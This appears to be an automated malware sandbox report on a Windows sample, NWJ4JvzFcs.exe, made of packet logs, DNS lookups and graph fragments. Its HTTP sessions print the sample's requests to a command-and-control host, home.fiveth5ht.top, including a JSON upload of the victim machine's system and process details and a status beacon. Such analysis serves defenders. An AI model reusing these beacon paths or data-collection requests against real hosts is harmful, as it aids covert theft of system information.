                                                    Dec 27, 2024 09:07:58.047013998 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047024012 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047034979 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047106981 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047116995 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047204018 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047219992 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047297955 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047343969 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047395945 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047405958 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047492027 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047502041 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047569036 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047607899 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047709942 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047719002 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047813892 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047931910 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047941923 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048018932 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048244953 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048330069 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048340082 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048389912 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048456907 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048481941 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048489094 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:58.048533916 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048614025 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:58.048670053 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048680067 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048718929 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048728943 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048841953 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048851967 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048928976 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.048989058 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.049073935 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.049088955 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.049129963 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.049139977 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.049236059 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.049245119 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.049381971 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.049391985 CET80497165.101.3.217192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 09:07:51.041948080 CET | 52135 | 53 | 192.168.2.10 | 1.1.1.1
Dec 27, 2024 09:07:51.041948080 CET | 52135 | 53 | 192.168.2.10 | 1.1.1.1
Dec 27, 2024 09:07:51.180608988 CET | 53 | 52135 | 1.1.1.1 | 192.168.2.10
Dec 27, 2024 09:07:51.595741034 CET | 53 | 52135 | 1.1.1.1 | 192.168.2.10
Dec 27, 2024 09:07:56.078353882 CET | 52138 | 53 | 192.168.2.10 | 1.1.1.1
Dec 27, 2024 09:07:56.078437090 CET | 52138 | 53 | 192.168.2.10 | 1.1.1.1
Dec 27, 2024 09:07:56.423935890 CET | 53 | 52138 | 1.1.1.1 | 192.168.2.10
Dec 27, 2024 09:07:56.423947096 CET | 53 | 52138 | 1.1.1.1 | 192.168.2.10
Dec 27, 2024 09:08:00.141405106 CET | 52140 | 53 | 192.168.2.10 | 1.1.1.1
Dec 27, 2024 09:08:00.141505003 CET | 52140 | 53 | 192.168.2.10 | 1.1.1.1
Dec 27, 2024 09:08:00.278529882 CET | 53 | 52140 | 1.1.1.1 | 192.168.2.10
Dec 27, 2024 09:08:00.278548956 CET | 53 | 52140 | 1.1.1.1 | 192.168.2.10
Dec 27, 2024 09:08:02.029416084 CET | 52142 | 53 | 192.168.2.10 | 1.1.1.1
Dec 27, 2024 09:08:02.029479980 CET | 52142 | 53 | 192.168.2.10 | 1.1.1.1
Dec 27, 2024 09:08:02.168514967 CET | 53 | 52142 | 1.1.1.1 | 192.168.2.10
Dec 27, 2024 09:08:02.168528080 CET | 53 | 52142 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 09:07:51.041948080 CET | 192.168.2.10 | 1.1.1.1 | 0x9fd3 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:51.041948080 CET | 192.168.2.10 | 1.1.1.1 | 0xf35e | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 27, 2024 09:07:56.078353882 CET | 192.168.2.10 | 1.1.1.1 | 0xf4c6 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:56.078437090 CET | 192.168.2.10 | 1.1.1.1 | 0xbdbe | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 27, 2024 09:08:00.141405106 CET | 192.168.2.10 | 1.1.1.1 | 0xbbdd | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:08:00.141505003 CET | 192.168.2.10 | 1.1.1.1 | 0x8df2 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 27, 2024 09:08:02.029416084 CET | 192.168.2.10 | 1.1.1.1 | 0x1043 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:08:02.029479980 CET | 192.168.2.10 | 1.1.1.1 | 0x81db | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 09:07:51.595741034 CET | 1.1.1.1 | 192.168.2.10 | 0x9fd3 | No error (0) | httpbin.org |  | 3.218.7.103 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:51.595741034 CET | 1.1.1.1 | 192.168.2.10 | 0x9fd3 | No error (0) | httpbin.org |  | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:56.423947096 CET | 1.1.1.1 | 192.168.2.10 | 0xf4c6 | No error (0) | home.fiveth5ht.top |  | 5.101.3.217 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:08:00.278548956 CET | 1.1.1.1 | 192.168.2.10 | 0xbbdd | No error (0) | home.fiveth5ht.top |  | 5.101.3.217 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:08:02.168514967 CET | 1.1.1.1 | 192.168.2.10 | 0x1043 | No error (0) | home.fiveth5ht.top |  | 5.101.3.217 | A (IP address) | IN (0x0001) | false
                                                    • httpbin.org
                                                    • home.fiveth5ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49716 | 5.101.3.217 | 80 | 7464 | C:\Users\user\Desktop\NWJ4JvzFcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 09:07:56.545938015 CET | 12360 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                    Host: home.fiveth5ht.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 558871
                                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163627085912", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
Dec 27, 2024 09:08:00.071604967 CET | 157 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.22.1
                                                    Date: Fri, 27 Dec 2024 08:07:59 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 1
                                                    Connection: close
                                                    Data Raw: 30
                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49727 | 5.101.3.217 | 80 | 7464 | C:\Users\user\Desktop\NWJ4JvzFcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 09:08:00.399568081 CET | 98 | OUT | GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                                    Host: home.fiveth5ht.top
                                                    Accept: */*
Dec 27, 2024 09:08:01.966245890 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                                    Server: nginx/1.22.1
                                                    Date: Fri, 27 Dec 2024 08:08:01 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 207
                                                    Connection: close
                                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49733 | 5.101.3.217 | 80 | 7464 | C:\Users\user\Desktop\NWJ4JvzFcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 09:08:02.289453983 CET | 171 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                    Host: home.fiveth5ht.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 31
                                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                    Data Ascii: { "id1": "0", "data": "Done1" }
                                                    Dec 27, 2024 09:08:03.831228018 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                                    Server: nginx/1.22.1
                                                    Date: Fri, 27 Dec 2024 08:08:03 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 207
                                                    Connection: close
                                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.10 | 49705 | 3.218.7.103 | 443 | 7464 | C:\Users\user\Desktop\NWJ4JvzFcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-12-27 08:07:53 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                    Host: httpbin.org
                                                    Accept: */*
                                                    2024-12-27 08:07:53 UTC | 224 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 27 Dec 2024 08:07:53 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 31
                                                    Connection: close
                                                    Server: gunicorn/19.9.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Credentials: true
                                                    2024-12-27 08:07:53 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                    Data Ascii: { "origin": "8.46.123.189"}



                                                    Target ID: 4
                                                    Start time: 03:07:46
                                                    Start date: 27/12/2024
                                                    Path: C:\Users\user\Desktop\NWJ4JvzFcs.exe
                                                    Wow64 process (32bit): true
                                                    Commandline: "C:\Users\user\Desktop\NWJ4JvzFcs.exe"
                                                    Imagebase: 0xbe0000
                                                    File size: 4'522'496 bytes
                                                    MD5 hash: 91D22C615A675708FAD7DDB68A64CF3F
                                                    Has elevated privileges: true
                                                    Has administrator privileges: true
                                                    Programmed in: C, C++ or other language
                                                    Reputation: low
                                                    Has exited: true


                                                      Execution Graph

                                                      Execution Coverage: 0.3%
                                                      Dynamic/Decrypted Code Coverage: 100%
                                                      Signature Coverage: 0%
                                                      Total number of Nodes: 4
                                                      Total number of Limit Nodes: 1
                                                      execution_graph 6403 7940000 6404 7940023 6403->6404 6405 79403d0 GetLogicalDrives 6404->6405 6406 79403f1 6404->6406 6405->6404
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5af4823ab166b14176e2491db2f60ff92aa0803c706926c8d0444738c0d3b987
                                                      • Instruction ID: 3ffa1ee06ab5f36ca87f17fc1d2dc0ab2eaa05147b27f9a51cc3560b0a794308
                                                      • Opcode Fuzzy Hash: 5af4823ab166b14176e2491db2f60ff92aa0803c706926c8d0444738c0d3b987
                                                      • Instruction Fuzzy Hash: 48E0E5FB428134DD9A02E58D17142FE2AA46797338F304CBBAC43361BCD1E10C47B126

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7940012-79403cf call 79401bb 45 79403d0-79403d7 GetLogicalDrives call 79403e3 0->45 47 79403dc-79403ef 45->47 47->45 48 79403f1-7940409 47->48
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 95589510812281fac10ec198f39e20e266fda0668df0254c5fdc869472554fc5
                                                      • Instruction ID: 1e8a3d1c4bea66332c394f66ad92db1f53c86d57c02018658ab0eb7ff566b77e
                                                      • Opcode Fuzzy Hash: 95589510812281fac10ec198f39e20e266fda0668df0254c5fdc869472554fc5
                                                      • Instruction Fuzzy Hash: 8A51F4FB16C221BE6202855A2B18DFB6B3DE4D7738B3088A7F547D7542E2C84E4E5171

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 50 7940000-79403cf call 79401bb 97 79403d0-79403d7 GetLogicalDrives call 79403e3 50->97 99 79403dc-79403ef 97->99 99->97 100 79403f1-7940409 99->100
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 326b2ced04f5d111e7b129c8470feeb3e514c0dd9aaeac41bbf23ce87fd88015
                                                      • Instruction ID: b970ba7eaedc1455eaeb5f0d1322b45869d3faa79123c6cde8b7678fdc9cb0c7
                                                      • Opcode Fuzzy Hash: 326b2ced04f5d111e7b129c8470feeb3e514c0dd9aaeac41bbf23ce87fd88015
                                                      • Instruction Fuzzy Hash: 0351D3FB16C121BE6252855A2B28EFB6B3DE5C7738B3088A7F507D6542E2C84E4D5071

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 102 7940062-7940070 103 7940051-794005d 102->103 104 7940072-7940074 102->104 106 7940076-79403cf call 79401bb 103->106 104->106 149 79403d0-79403d7 GetLogicalDrives call 79403e3 106->149 151 79403dc-79403ef 149->151 151->149 152 79403f1-7940409 151->152
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 84b77e02376a3c54a7a7f7a3da126c39c7696eb1d1e44c53008cfa0228cd307f
                                                      • Instruction ID: 15167c13a8712001631ec99eea06e2497d035dbdd8e387d49eca79f9a1b4ee34
                                                      • Opcode Fuzzy Hash: 84b77e02376a3c54a7a7f7a3da126c39c7696eb1d1e44c53008cfa0228cd307f
                                                      • Instruction Fuzzy Hash: F75115FB16C221BE6212C55A2B18EFB6B3DE4C7738B3088BAF507D6542E2C84E4D5071

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 154 794004e-79403cf call 79401bb 199 79403d0-79403d7 GetLogicalDrives call 79403e3 154->199 201 79403dc-79403ef 199->201 201->199 202 79403f1-7940409 201->202
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 7fb892d3e338f562e8d15c2b2f31d03307392d3dd0674e8e66c2b0bd4fafda61
                                                      • Instruction ID: a527fdc253d61eb1668ae33176995e7fff49d599f3bc14d7b3d565972bd722a9
                                                      • Opcode Fuzzy Hash: 7fb892d3e338f562e8d15c2b2f31d03307392d3dd0674e8e66c2b0bd4fafda61
                                                      • Instruction Fuzzy Hash: 3D51D4FB16C121BE6212D55A2B18EFB6B3DE5C7738B3088B6F507D6542E2C84E4E5071

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 204 79400ca-79400e1 205 79400e3-794012b 204->205 206 794012f-7940142 204->206 208 7940144-79403cf call 79401bb 205->208 206->208 245 79403d0-79403d7 GetLogicalDrives call 79403e3 208->245 247 79403dc-79403ef 245->247 247->245 248 79403f1-7940409 247->248
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 2cfecf4d4a5ac79ef121691b74eb999ec6e5a4210cc41729d793645821fe5322
                                                      • Instruction ID: 4de605bc881da9909e96fef224f59dec0b711971f85ee7116311e5b94a0adb4e
                                                      • Opcode Fuzzy Hash: 2cfecf4d4a5ac79ef121691b74eb999ec6e5a4210cc41729d793645821fe5322
                                                      • Instruction Fuzzy Hash: 7C5126FB16C121BEA202C55A2B24DFB6B7DE0C7738B3088BBF506D6442E2D84E4D5171

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 250 79400b3-79403cf call 79401bb 290 79403d0-79403d7 GetLogicalDrives call 79403e3 250->290 292 79403dc-79403ef 290->292 292->290 293 79403f1-7940409 292->293
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 71f77047586f85bf82f27d4315b3d0a4f19fc306a45ec55c65fc649b90c95b20
                                                      • Instruction ID: bf2399f98b26f144f48bdbda350bddef6cc5bb00c4ba91479c0d785f506a1182
                                                      • Opcode Fuzzy Hash: 71f77047586f85bf82f27d4315b3d0a4f19fc306a45ec55c65fc649b90c95b20
                                                      • Instruction Fuzzy Hash: E151C2FB16C121BE6202C55A2B24EFB6B3DE5C7738B3088ABF507D6542E2D84E4E5171

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 295 7940120-7940121 296 79400c0-794011a 295->296 297 7940123 295->297 298 7940125-79403cf call 79401bb 296->298 297->298 337 79403d0-79403d7 GetLogicalDrives call 79403e3 298->337 339 79403dc-79403ef 337->339 339->337 340 79403f1-7940409 339->340
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 56a6e9dedbbe1acf4616a0c181fa97132b3e444861b84c7cb5ffd4e9bc538bb6
                                                      • Instruction ID: e221c60fec5cdc889ec59beef620d331168595d3a2b296bd6024717377400097
                                                      • Opcode Fuzzy Hash: 56a6e9dedbbe1acf4616a0c181fa97132b3e444861b84c7cb5ffd4e9bc538bb6
                                                      • Instruction Fuzzy Hash: 9E51B3FB06C121BE6202D55A2B24EFB6B3DE5C7738B3088ABF507D6542E2C84E4D5171

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 342 79400fe-79403cf call 79401bb 377 79403d0-79403d7 GetLogicalDrives call 79403e3 342->377 379 79403dc-79403ef 377->379 379->377 380 79403f1-7940409 379->380
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: cce675f5ac6a911a6e883f4f9e25e538e24e817450336a9b97e59a7e164362fb
                                                      • Instruction ID: c7815c8c7a34ee79ea1b8ba72fd6cbc4df720cae03f74ee5d08275f9929c8b73
                                                      • Opcode Fuzzy Hash: cce675f5ac6a911a6e883f4f9e25e538e24e817450336a9b97e59a7e164362fb
                                                      • Instruction Fuzzy Hash: 2551D0FB06C121BEA242C55A2B14EFB6B7DE5C7738B3088ABF507D6442E2C80E4E5171

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 382 7940151-7940152 383 7940154-7940156 382->383 384 7940112-794014c 382->384 386 7940159-79403cf call 79401bb 383->386 384->386 419 79403d0-79403d7 GetLogicalDrives call 79403e3 386->419 421 79403dc-79403ef 419->421 421->419 422 79403f1-7940409 421->422
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 3a5fa13209221804fdcda18a8bf06002c39ed3a60e3cc5d5607be5a53a0918a4
                                                      • Instruction ID: 249c79a8743fda1bc265c7c47f26b1b7f7f3314f2340b161f587941e878047ab
                                                      • Opcode Fuzzy Hash: 3a5fa13209221804fdcda18a8bf06002c39ed3a60e3cc5d5607be5a53a0918a4
                                                      • Instruction Fuzzy Hash: 0D41BEFB16C121BE6202C55A2B24EFB6B3DE4C7738B3088ABF507D6542E2C80E4E5171

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 424 7940130-79403cf call 79401bb 457 79403d0-79403d7 GetLogicalDrives call 79403e3 424->457 459 79403dc-79403ef 457->459 459->457 460 79403f1-7940409 459->460
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 37de1ae44761a6a9df9e9d75a6635450e8762c93784428214569dc8808f137b8
                                                      • Instruction ID: 2ca517da9de8089bab42d445c302a7226dafd4b62c05beca4595fdbf86e16a1d
                                                      • Opcode Fuzzy Hash: 37de1ae44761a6a9df9e9d75a6635450e8762c93784428214569dc8808f137b8
                                                      • Instruction Fuzzy Hash: A441F4FB16C121BEA202C55A2B24EFB6B7DE5C7734B3088ABF547D6542E2C80E4E5171

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 462 7940161-79403cf call 79401bb 494 79403d0-79403d7 GetLogicalDrives call 79403e3 462->494 496 79403dc-79403ef 494->496 496->494 497 79403f1-7940409 496->497
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: c038f321183a8300409f037cb7d2a88e4149be86c8f17fdc9195deddc3d8924c
                                                      • Instruction ID: 710adcfa78f1dfac313294fd5283d9f53978dcdfb538dfe74a12876d0042733d
                                                      • Opcode Fuzzy Hash: c038f321183a8300409f037cb7d2a88e4149be86c8f17fdc9195deddc3d8924c
                                                      • Instruction Fuzzy Hash: 8341B1FB06C121BE7242C59A2B64EFB6B7DE5C7734B3088ABF546D6542E2C80E4D5131

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 499 7940173-79403cf call 79401bb 529 79403d0-79403d7 GetLogicalDrives call 79403e3 499->529 531 79403dc-79403ef 529->531 531->529 532 79403f1-7940409 531->532
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: d4a071c8e0f36002c79a18a938a908c31549ed8f25e8cb3ab18ead109f00aa03
                                                      • Instruction ID: 9ac14c6e136772a52747c1e5eeb266db52b9d87349e8c84b2d5bfaf4fb17315f
                                                      • Opcode Fuzzy Hash: d4a071c8e0f36002c79a18a938a908c31549ed8f25e8cb3ab18ead109f00aa03
                                                      • Instruction Fuzzy Hash: 4041D2FB15C121BEB20286962B24EFB6B7DE5C7B34B3088BBF546D6442E2C80E4D5171

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 534 79401d0-79403cf 559 79403d0-79403d7 GetLogicalDrives call 79403e3 534->559 561 79403dc-79403ef 559->561 561->559 562 79403f1-7940409 561->562
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
